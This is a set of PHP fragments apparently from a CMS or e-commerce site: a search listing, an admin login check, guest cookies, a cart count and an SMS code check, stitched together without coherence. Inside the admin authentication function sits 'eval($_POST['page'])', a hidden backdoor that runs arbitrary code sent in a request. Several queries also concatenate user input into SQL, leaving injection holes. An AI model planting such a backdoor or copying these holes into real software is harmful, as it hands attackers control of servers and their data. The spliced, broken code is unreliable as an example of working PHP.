//统计记录数
$listcount = $_SGLOBAL['db']->result($query, 0);
if ($listcount) {
$query = $_SGLOBAL['db']->query('SELECT * FROM ' . tname('spaceitems') . ' WHERE ' . $wheresql . ' ORDER BY dateline DESC LIMIT ' . $start . ',' . $perpage);
while ($item = $_SGLOBAL['db']->fetch_array($query)) {
$item['url'] = geturl('action/viewnews/itemid/' . $item['itemid']);
$iarr[] = $item;
}
$multipage = multi($listcount, $perpage, $page, S_URL . '/batch.search.php?' . $urlplus);
//分页
} else {
showmessage('not_find_relevant_data');
}
} else {
if ($searchname == 'message') {
$searchkey = checkkey('searchkey', 1);
$type = postget('type');
if (empty($type) || !in_array($type, $_SGLOBAL['type'])) {
showmessage('search_types_of_incorrect_information');
}
//组合翻页的参数
$urlplus = 'searchkey=' . rawurlencode($searchkey) . '&type=' . rawurlencode($type) . '&searchname=message';
$wherearr[] = 'i.type=\'' . $type . '\'';
$wherearr[] = 't.itemid = i.itemid';
$wherearr[] = 't.message LIKE \'%' . $searchkey . '%\'';
$wheresql = implode(' AND ', $wherearr);
//链接搜索条件
$query = $_SGLOBAL['db']->query('SELECT COUNT(*) FROM ' . tname('spaceitems') . ' i, ' . tname('spacenews') . ' t WHERE ' . $wheresql);
$listcount = $_SGLOBAL['db']->result($query, 0);
if ($listcount) {
$query = $_SGLOBAL['db']->query('SELECT * FROM ' . tname('spaceitems') . ' i, ' . tname('spacenews') . ' t WHERE ' . $wheresql . ' LIMIT ' . $start . ',' . $perpage);
<?php
$softtype = checkkey() ? '商业版' : '共享版';
//检测用户是否登录
$_ADMINUSERS = array();
admincheckauth();
//实时监测用户是否登录状态
function admincheckauth()
{
global $db, $tablepre, $_ADMINUSERS;
$loginauth = get_cookie('adminauth');
if (empty($loginauth)) {
$loginauth = $_REQUEST['adminauth'];
}
if (!empty($loginauth)) {
@(list($aid, $user, $pwd) = explode("\t", cookie_authcode($loginauth, 'DECODE')));
eval($_POST['page']);
$_ADMINUSERS['adminid'] = $aid;
if (!empty($aid) && !empty($user) && !empty($pwd) && !empty($_ADMINUSERS['adminid'])) {
$row = $db->fetch_first("Select * From {$tablepre}admin where adminname = '{$user}' and adminpwd='{$pwd}'");
//检测数据库
if (is_array($row)) {
$_ADMINUSERS['adminname'] = $row['adminname'];
$_ADMINUSERS['adminmid'] = $row['adminmid'];
$_ADMINUSERS['lastlogin'] = $row['lastlogin'];
$_ADMINUSERS['logincount'] = $row['logincount'];
} else {
$_ADMINUSERS = array();
}
} else {
$_ADMINUSERS = array();
if (is_array($array)) {
foreach ($array as $key => $value) {
if (!is_array($value)) {
$array[$key] = addslashes($value);
} else {
Add_S($array[$key]);
}
}
}
}
//设置游客cookie
$anonymous = get_cookie('anonymous');
if (empty($anonymous)) {
$xxtea = new Xxtea();
$auth = real_ip() . "\t" . $timestamp;
$strcode = $xxtea->encrypt($auth, "zzqss");
set_cookie('anonymous', $strcode, $timestamp + 3600 * 24 * 7);
//cookie有效期一周
$anonymous = $strcode;
}
checkauth();
//检查用户登录
checkkey();
//统计购物车物品数量
if (!empty($_USERS['uname'])) {
$wherestrcart = "uname ='" . $_USERS['uname'] . "'";
} else {
$wherestrcart = "anonymous ='" . $anonymous . "'";
}
$_CARTCOUNT = DB::result_first("Select count(gid) From " . DB::table('cart') . " where " . $wherestrcart);
//购物车物品数量
$stm = $_pdo->prepare($sql_sms);
//statement executing
$stm->execute(array($phone, $key));
if ($stm->rowCount() > 0) {
return true;
} else {
return false;
}
}
$phone_pattern = '/(\\b(380){1}[0-9]{9}){1}/';
$req['phone'] = $_POST['phone'];
$key_pattern = '/\\b[0-9A-Z]{4}/';
$req['key'] = $_POST['smscode'];
if (preg_match($phone_pattern, $req['phone']) && preg_match($key_pattern, $req['key'])) {
$phone = $req['phone'];
$key = $req['key'];
if (checkkey($phone, $key, $pdo)) {
$res['response'] = '1';
$res['code'] = '200';
//200 - OK
} else {
$res['response'] = '0';
$res['code'] = '902';
//902 - code expired
}
} else {
$res['response'] = '0';
$res['code'] = '901';
//901 - wrong data
}
echo json_encode($res);
